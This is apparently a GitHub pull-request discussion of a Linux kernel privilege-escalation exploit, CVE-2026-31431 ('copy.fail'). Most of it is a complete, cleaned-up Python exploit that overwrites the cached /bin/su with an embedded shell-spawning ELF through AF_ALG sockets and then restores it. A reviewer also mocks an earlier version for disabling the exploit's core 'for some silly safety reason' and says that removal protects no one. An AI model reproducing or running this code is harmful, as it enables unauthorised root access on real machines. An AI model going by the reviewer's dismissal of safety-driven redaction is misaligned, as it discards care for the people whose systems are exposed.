Create exploit_decoded.py

[jwalzer]

Create a readable and understandable version of the Exploit code, to learn.

[nneonneo]

I doubt this would actually get merged, but this file is fairly useless as-is because you've removed the main logic for some silly safety reason.

[nneonneo]

pointless rename

[nneonneo]

may as well directly decode this; zlib was used solely for golfing

[nneonneo]

pointless and trivial function

[nneonneo]

you disabled the one interesting part of the code (or your AI did that for you), shame. If your goal is "learning", this is not the way to do it.

Note that disabling this function serves no practical purpose since the actual exploit already contains the full functional logic, so you're not protecting anyone by removing the functionality from here.

[nneonneo]

these are pointless renames; better to use the well-known names from the kernel

[florentx]

Inspired by this PR, and #5 as well.
This is a version which:

• use constants from socket module
• use latest version from PR Golf harder (-20 bytes) #5
• restore original in-memory payload afterwards (so su is still working without reboot)

#!/usr/bin/env python3
# CVE-2026-31431 https://copy.fail/
import base64
import os
import socket

ELF_PAYLOAD = base64.b64decode(
    "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAFAAAAAAAA"
    "AAAAAAAAAEAAAAAAAAAAQAAAAAAAHAAAAAAAAAAcAAAAAAAAAAAQAAAAAAAAamlYMf8PBUiNPQYAAABqO1iZDwUvYmluL3NoAA=="
)
SU_PATH = "/bin/su"


# socket.SOCK_SEQPACKET   # 5
# socket.AF_ALG     # 38
# socket.SOL_ALG    # 279
#
# socket.ALG_SET_KEY            # 1
# socket.ALG_SET_IV             # 2
# socket.ALG_SET_OP             # 3
# socket.ALG_SET_AEAD_ASSOCLEN  # 4
# socket.ALG_SET_AEAD_AUTHSIZE  # 5

# socket.ALG_OP_DECRYPT  # 0
# socket.ALG_OP_ENCRYPT  # 1


def copy_fail(path, payload):
    pos = 0
    with open(path, "rb") as fobj:
        while chunk := payload[pos:(pos := pos + 4)]:
            sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
            sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
            key = b'\x08\0\1\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0'
            sock.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            sock.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
            sconn, __ = sock.accept()
            sconn.sendmsg(
                [b"AAAA" + chunk],
                [
                    (socket.SOL_ALG, socket.ALG_SET_OP, socket.ALG_OP_DECRYPT.to_bytes(4, "little")),
                    (socket.SOL_ALG, socket.ALG_SET_IV, b"\x10" + b"\0" * 19),
                    (socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, b"\x08" + b"\0" * 3),
                ],
                socket.MSG_MORE,
            )
            sconn.sendfile(fobj, 0, pos)
            try:
                sconn.recv(4 + pos)
            except OSError:
                pass


def read_bytes(path, size):
    with open(path, "rb") as fobj:
        return fobj.read(size)


def main(bin_path=SU_PATH, elf_payload=ELF_PAYLOAD):
    elf_saved = read_bytes(bin_path, len(elf_payload))
    try:
        copy_fail(bin_path, elf_payload)
        os.system("su -V")
    finally:
        copy_fail(bin_path, elf_saved)
        os.system("su -V")
        print(f"{bin_path} Restored")


if __name__ == "__main__":
    main()

[florentx]

Another way to clean the cache after trying the exploit:

~$ echo 3 |sudo tee /proc/sys/vm/drop_caches
3
~$ su -V
su from util-linux 2.34